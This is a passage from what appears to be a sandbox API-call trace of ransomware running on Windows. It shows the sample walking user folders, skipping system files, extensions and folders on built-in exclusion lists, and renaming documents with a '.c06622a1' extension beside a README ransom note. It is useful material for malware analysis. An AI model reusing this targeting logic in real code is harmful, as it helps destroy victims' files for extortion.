[0149.560] _wcsicmp (_Str1="scr", _Str2="ods") returned 4 [0149.560] wcslen (_String="scr") returned 0x3 [0149.560] _wcsicmp (_Str1="shs", _Str2="ods") returned 4 [0149.560] wcslen (_String="shs") returned 0x3 [0149.560] _wcsicmp (_Str1="spl", _Str2="ods") returned 4 [0149.560] wcslen (_String="spl") returned 0x3 [0149.560] _wcsicmp (_Str1="sys", _Str2="ods") returned 4 [0149.560] wcslen (_String="sys") returned 0x3 [0149.560] _wcsicmp (_Str1="theme", _Str2="ods") returned 5 [0149.561] wcslen (_String="theme") returned 0x5 [0149.561] _wcsicmp (_Str1="themepack", _Str2="ods") returned 5 [0149.561] wcslen (_String="themepack") returned 0x9 [0149.561] _wcsicmp (_Str1="wpx", _Str2="ods") returned 8 [0149.561] wcslen (_String="wpx") returned 0x3 [0149.561] _wcsicmp (_Str1="lock", _Str2="ods") returned -3 [0149.561] wcslen (_String="lock") returned 0x4 [0149.561] _wcsicmp (_Str1="key", _Str2="ods") returned -4 [0149.561] wcslen (_String="key") returned 0x3 [0149.561] _wcsicmp (_Str1="hta", _Str2="ods") returned -7 [0149.561] wcslen (_String="hta") returned 0x3 [0149.561] _wcsicmp (_Str1="msi", _Str2="ods") returned -2 [0149.561] wcslen (_String="msi") returned 0x3 [0149.561] _wcsicmp (_Str1="pdb", _Str2="ods") returned 1 [0149.561] wcslen (_String="pdb") returned 0x3 [0149.561] _wcsicmp (_Str1="sql", _Str2="ods") returned 4 [0149.561] wcslen (_String="sql") returned 0x3 [0149.561] _wcsicmp (_Str1="sqlite", _Str2="ods") returned 4 [0149.561] wcslen (_String="sqlite") returned 0x6 [0149.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 0x10 [0149.562] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.562] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" [0149.562] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned 0x44 [0149.562] wcscpy (in: _Dest=0x4530132, _Source="QY0nMDkwxi6m.ods" | out: _Dest="QY0nMDkwxi6m.ods") returned="QY0nMDkwxi6m.ods" [0149.562] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods", dwFileAttributes=0x80) returned 1 [0149.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\qy0nmdkwxi6m.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0149.562] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.562] ReadFile (in: hFile=0x628, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.563] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x9cca72a7 [0149.563] RtlComputeCrc32 (PartialCrc=0x72a7, Buffer=0x3fe674, Length=0x80) returned 0xb494c5a0 [0149.563] RtlComputeCrc32 (PartialCrc=0xc5a0, Buffer=0x3fe674, Length=0x80) returned 0x63dbc301 [0149.563] RtlComputeCrc32 (PartialCrc=0xc301, Buffer=0x3fe674, Length=0x80) returned 0x57cb65bc [0149.563] RtlComputeCrc32 (PartialCrc=0x65bc, Buffer=0x3fe674, Length=0x80) returned 0x15adf8df [0149.564] CloseHandle (hObject=0x628) returned 1 [0149.564] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.564] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods" [0149.564] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods") returned 0x55 [0149.564] wcscpy (in: _Dest=0x454015a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.564] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\qy0nmdkwxi6m.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\qy0nmdkwxi6m.ods.c06622a1"), dwFlags=0x8) returned 1 [0149.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\QY0nMDkwxi6m.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\qy0nmdkwxi6m.ods.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x628 [0149.567] CreateIoCompletionPort (FileHandle=0x628, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.567] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5090020 [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fbce623 [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78a4d3f7 [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e0b1030 [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x615e32ca [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41c10266 [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b4d289c [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d964c50 [0149.575] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4caa5d1d [0149.579] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5090094, Length=0x80) returned 0xfc48d919 [0149.579] RtlComputeCrc32 (PartialCrc=0xd919, Buffer=0x5090094, Length=0x80) returned 0x81c19d09 [0149.579] RtlComputeCrc32 (PartialCrc=0x9d09, Buffer=0x5090094, Length=0x80) returned 0x30e93d79 [0149.579] RtlComputeCrc32 (PartialCrc=0x3d79, Buffer=0x5090094, Length=0x80) returned 0x940fd652 [0149.579] RtlComputeCrc32 (PartialCrc=0xd652, Buffer=0x5090094, Length=0x80) returned 0x9a372cbf [0149.580] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5090020) returned 1 [0149.580] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.580] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.580] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7b4dcc0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7b4dcc0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7b4dcc0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.580] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.580] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebc0dd0, ftCreationTime.dwHighDateTime=0x1d5db12, ftLastAccessTime.dwLowDateTime=0xcb1a8c60, ftLastAccessTime.dwHighDateTime=0x1d5ded6, ftLastWriteTime.dwLowDateTime=0xcb1a8c60, ftLastWriteTime.dwHighDateTime=0x1d5ded6, nFileSizeHigh=0x0, nFileSizeLow=0x5ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="uIpMQ O66NBZH.docx", cAlternateFileName="UIPMQO~1.DOC")) returned 1 [0149.580] _wcsicmp (_Str1="uIpMQ O66NBZH.docx", _Str2="README.c06622a1.TXT") returned 3 [0149.580] wcsstr (_Str="uIpMQ O66NBZH.docx", _SubStr="README") returned 0x0 [0149.580] _wcsicmp (_Str1="autorun.inf", _Str2="uIpMQ O66NBZH.docx") returned -20 [0149.580] wcslen (_String="autorun.inf") returned 0xb [0149.580] _wcsicmp (_Str1="boot.ini", _Str2="uIpMQ O66NBZH.docx") returned -19 [0149.580] wcslen (_String="boot.ini") returned 0x8 [0149.580] _wcsicmp (_Str1="bootfont.bin", _Str2="uIpMQ O66NBZH.docx") returned -19 [0149.580] wcslen (_String="bootfont.bin") returned 0xc [0149.580] _wcsicmp (_Str1="bootsect.bak", _Str2="uIpMQ O66NBZH.docx") returned -19 [0149.580] wcslen (_String="bootsect.bak") returned 0xc [0149.580] _wcsicmp (_Str1="desktop.ini", _Str2="uIpMQ O66NBZH.docx") returned -17 [0149.580] wcslen (_String="desktop.ini") returned 0xb [0149.581] _wcsicmp (_Str1="iconcache.db", _Str2="uIpMQ O66NBZH.docx") returned -12 [0149.581] wcslen (_String="iconcache.db") returned 0xc [0149.581] _wcsicmp (_Str1="ntldr", _Str2="uIpMQ O66NBZH.docx") returned -7 [0149.581] wcslen (_String="ntldr") returned 0x5 [0149.581] _wcsicmp (_Str1="ntuser.dat", _Str2="uIpMQ O66NBZH.docx") returned -7 [0149.581] wcslen (_String="ntuser.dat") returned 0xa [0149.581] _wcsicmp (_Str1="ntuser.dat.log", _Str2="uIpMQ O66NBZH.docx") returned -7 [0149.581] wcslen (_String="ntuser.dat.log") returned 0xe [0149.581] _wcsicmp (_Str1="ntuser.ini", _Str2="uIpMQ O66NBZH.docx") returned -7 [0149.581] wcslen (_String="ntuser.ini") returned 0xa [0149.581] _wcsicmp (_Str1="thumbs.db", _Str2="uIpMQ O66NBZH.docx") returned -1 [0149.581] wcslen (_String="thumbs.db") returned 0x9 [0149.581] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0149.581] wcslen (_String="386") returned 0x3 [0149.581] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0149.581] wcslen (_String="adv") returned 0x3 [0149.581] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0149.581] wcslen (_String="ani") returned 0x3 [0149.581] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0149.581] wcslen (_String="bat") returned 0x3 [0149.581] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0149.582] wcslen (_String="bin") returned 0x3 [0149.582] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0149.582] wcslen (_String="cab") returned 0x3 [0149.582] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0149.582] wcslen (_String="cmd") returned 0x3 [0149.582] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0149.582] wcslen (_String="com") returned 0x3 [0149.582] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0149.582] wcslen (_String="cpl") returned 0x3 [0149.582] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0149.582] wcslen (_String="cur") returned 0x3 [0149.582] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0149.582] wcslen (_String="deskthemepack") returned 0xd [0149.582] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0149.582] wcslen (_String="diagcab") returned 0x7 [0149.582] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0149.582] wcslen (_String="diagcfg") returned 0x7 [0149.582] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0149.582] wcslen (_String="diagpkg") returned 0x7 [0149.582] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0149.582] wcslen (_String="dll") returned 0x3 [0149.582] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0149.583] wcslen (_String="drv") returned 0x3 [0149.583] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0149.583] wcslen (_String="exe") returned 0x3 [0149.583] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0149.583] wcslen (_String="hlp") returned 0x3 [0149.583] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0149.583] wcslen (_String="icl") returned 0x3 [0149.583] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0149.583] wcslen (_String="icns") returned 0x4 [0149.583] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0149.583] wcslen (_String="ico") returned 0x3 [0149.583] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0149.583] wcslen (_String="ics") returned 0x3 [0149.583] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0149.583] wcslen (_String="idx") returned 0x3 [0149.583] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0149.583] wcslen (_String="ldf") returned 0x3 [0149.583] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0149.583] wcslen (_String="lnk") returned 0x3 [0149.583] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0149.583] wcslen (_String="mod") returned 0x3 [0149.583] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0149.584] wcslen (_String="mpa") returned 0x3 [0149.584] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0149.584] wcslen (_String="msc") returned 0x3 [0149.584] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0149.584] wcslen (_String="msp") returned 0x3 [0149.584] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0149.584] wcslen (_String="msstyles") returned 0x8 [0149.584] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0149.584] wcslen (_String="msu") returned 0x3 [0149.584] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0149.584] wcslen (_String="nls") returned 0x3 [0149.584] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0149.584] wcslen (_String="nomedia") returned 0x7 [0149.584] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0149.584] wcslen (_String="ocx") returned 0x3 [0149.584] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0149.584] wcslen (_String="prf") returned 0x3 [0149.584] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0149.584] wcslen (_String="ps1") returned 0x3 [0149.584] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0149.584] wcslen (_String="rom") returned 0x3 [0149.585] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0149.585] wcslen (_String="rtp") returned 0x3 [0149.585] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0149.585] wcslen (_String="scr") returned 0x3 [0149.585] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0149.585] wcslen (_String="shs") returned 0x3 [0149.585] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0149.585] wcslen (_String="spl") returned 0x3 [0149.585] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0149.585] wcslen (_String="sys") returned 0x3 [0149.585] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0149.585] wcslen (_String="theme") returned 0x5 [0149.585] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0149.585] wcslen (_String="themepack") returned 0x9 [0149.585] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0149.585] wcslen (_String="wpx") returned 0x3 [0149.585] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0149.585] wcslen (_String="lock") returned 0x4 [0149.585] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0149.585] wcslen (_String="key") returned 0x3 [0149.585] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0149.586] wcslen (_String="hta") returned 0x3 [0149.586] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0149.586] wcslen (_String="msi") returned 0x3 [0149.586] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0149.586] wcslen (_String="pdb") returned 0x3 [0149.586] _wcsicmp (_Str1="sql", _Str2="docx") returned 15 [0149.586] wcslen (_String="sql") returned 0x3 [0149.586] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0149.586] wcslen (_String="sqlite") returned 0x6 [0149.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 0x10 [0149.586] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.586] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" [0149.586] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned 0x44 [0149.586] wcscpy (in: _Dest=0x4530132, _Source="uIpMQ O66NBZH.docx" | out: _Dest="uIpMQ O66NBZH.docx") returned="uIpMQ O66NBZH.docx" [0149.586] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx", dwFileAttributes=0x80) returned 1 [0149.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\uipmq o66nbzh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0149.587] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.588] ReadFile (in: hFile=0x644, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.589] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xf21e8272 [0149.589] RtlComputeCrc32 (PartialCrc=0x8272, Buffer=0x3fe674, Length=0x80) returned 0x18ca513f [0149.589] RtlComputeCrc32 (PartialCrc=0x513f, Buffer=0x3fe674, Length=0x80) returned 0xa7a382e0 [0149.589] RtlComputeCrc32 (PartialCrc=0x82e0, Buffer=0x3fe674, Length=0x80) returned 0x348bc9ef [0149.589] RtlComputeCrc32 (PartialCrc=0xc9ef, Buffer=0x3fe674, Length=0x80) returned 0x1cded403 [0149.589] CloseHandle (hObject=0x644) returned 1 [0149.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.589] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx" [0149.589] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx") returned 0x57 [0149.589] wcscpy (in: _Dest=0x454015e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.589] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\uipmq o66nbzh.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\uipmq o66nbzh.docx.c06622a1"), dwFlags=0x8) returned 1 [0149.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\uIpMQ O66NBZH.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\uipmq o66nbzh.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0149.593] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.593] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5120020 [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x18a3ebf1 [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1336843e [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x75fce7d0 [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4691855 [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8d0199c [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x13d4351d [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5852b2b7 [0149.601] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7eee40bf [0149.606] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5120094, Length=0x80) returned 0xe786ac3f [0149.606] RtlComputeCrc32 (PartialCrc=0xac3f, Buffer=0x5120094, Length=0x80) returned 0x88491752 [0149.606] RtlComputeCrc32 (PartialCrc=0x1752, Buffer=0x5120094, Length=0x80) returned 0x8708968c [0149.606] RtlComputeCrc32 (PartialCrc=0x968c, Buffer=0x5120094, Length=0x80) returned 0xebf1a62c [0149.606] RtlComputeCrc32 (PartialCrc=0xa62c, Buffer=0x5120094, Length=0x80) returned 0x4ee4a6ce [0149.606] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5120020) returned 1 [0149.606] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.606] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.606] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.607] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0149.607] _wcsicmp (_Str1="backup", _Str2="x kVsHDkjAuECPHeoW") returned -22 [0149.607] wcslen (_String="backup") returned 0x6 [0149.607] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.607] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.607] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbfcb80, ftCreationTime.dwHighDateTime=0x1d5e773, ftLastAccessTime.dwLowDateTime=0xa1a52030, ftLastAccessTime.dwHighDateTime=0x1d5e0ba, ftLastWriteTime.dwLowDateTime=0xa1a52030, ftLastWriteTime.dwHighDateTime=0x1d5e0ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="z7yV5TDsi7l", cAlternateFileName="Z7YV5T~1")) returned 1 [0149.607] _wcsicmp (_Str1="$recycle.bin", _Str2="z7yV5TDsi7l") returned -86 [0149.607] wcslen (_String="$recycle.bin") returned 0xc [0149.607] _wcsicmp (_Str1="config.msi", _Str2="z7yV5TDsi7l") returned -23 [0149.607] wcslen (_String="config.msi") returned 0xa [0149.607] _wcsicmp (_Str1="$windows.~bt", _Str2="z7yV5TDsi7l") returned -86 [0149.607] wcslen (_String="$windows.~bt") returned 0xc [0149.607] _wcsicmp (_Str1="$windows.~ws", _Str2="z7yV5TDsi7l") returned -86 [0149.607] wcslen (_String="$windows.~ws") returned 0xc [0149.607] _wcsicmp (_Str1="windows", _Str2="z7yV5TDsi7l") returned -3 [0149.607] wcslen (_String="windows") returned 0x7 [0149.608] _wcsicmp (_Str1="appdata", _Str2="z7yV5TDsi7l") returned -25 [0149.608] wcslen (_String="appdata") returned 0x7 [0149.608] _wcsicmp (_Str1="application data", _Str2="z7yV5TDsi7l") returned -25 [0149.608] wcslen (_String="application data") returned 0x10 [0149.608] _wcsicmp (_Str1="boot", _Str2="z7yV5TDsi7l") returned -24 [0149.608] wcslen (_String="boot") returned 0x4 [0149.608] _wcsicmp (_Str1="google", _Str2="z7yV5TDsi7l") returned -19 [0149.608] wcslen (_String="google") returned 0x6 [0149.608] _wcsicmp (_Str1="mozilla", _Str2="z7yV5TDsi7l") returned -13 [0149.608] wcslen (_String="mozilla") returned 0x7 [0149.608] _wcsicmp (_Str1="program files", _Str2="z7yV5TDsi7l") returned -10 [0149.608] wcslen (_String="program files") returned 0xd [0149.608] _wcsicmp (_Str1="program files (x86)", _Str2="z7yV5TDsi7l") returned -10 [0149.608] wcslen (_String="program files (x86)") returned 0x13 [0149.608] _wcsicmp (_Str1="programdata", _Str2="z7yV5TDsi7l") returned -10 [0149.608] wcslen (_String="programdata") returned 0xb [0149.608] _wcsicmp (_Str1="system volume information", 